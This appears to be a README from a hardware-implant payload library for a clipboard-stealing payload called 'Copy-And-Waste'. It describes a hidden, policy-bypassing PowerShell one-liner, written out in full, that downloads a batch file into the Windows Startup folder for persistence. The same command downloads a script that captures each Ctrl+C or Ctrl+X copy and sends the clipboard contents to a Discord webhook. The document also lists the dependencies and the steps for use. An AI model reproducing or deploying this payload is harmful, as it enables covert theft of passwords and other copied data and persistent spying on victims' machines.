omg-payloads/payloads/library/exfiltration/Copy-And-Waste/README.md

3.5 KiB

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Copy-And-Waste

A payload to exfiltrate clipboard contents

Description

This payload uses iwr to download 2 files

  • I.bat
  • c.ps1

I.bat is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup

c.ps1 will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click

Then the contents will then be sent to the discord webhook for viewing pleasure

For killing the script press both Ctrl buttons at the same time [It will resume at reboot]

Getting Started

Dependencies

  • Pastebin or other file sharing service, Discord webhook or other webhook service
  • Windows 10,11
  • Here is a tutorial on how to use Discord webhooks

(back to top)

Executing program

  • Plug in your device
  • Device will download both files and place them in proper directories to then run the script
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

(back to top)

Contributing

All contributors names will be listed here:

atomiczsec & I-Am-Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)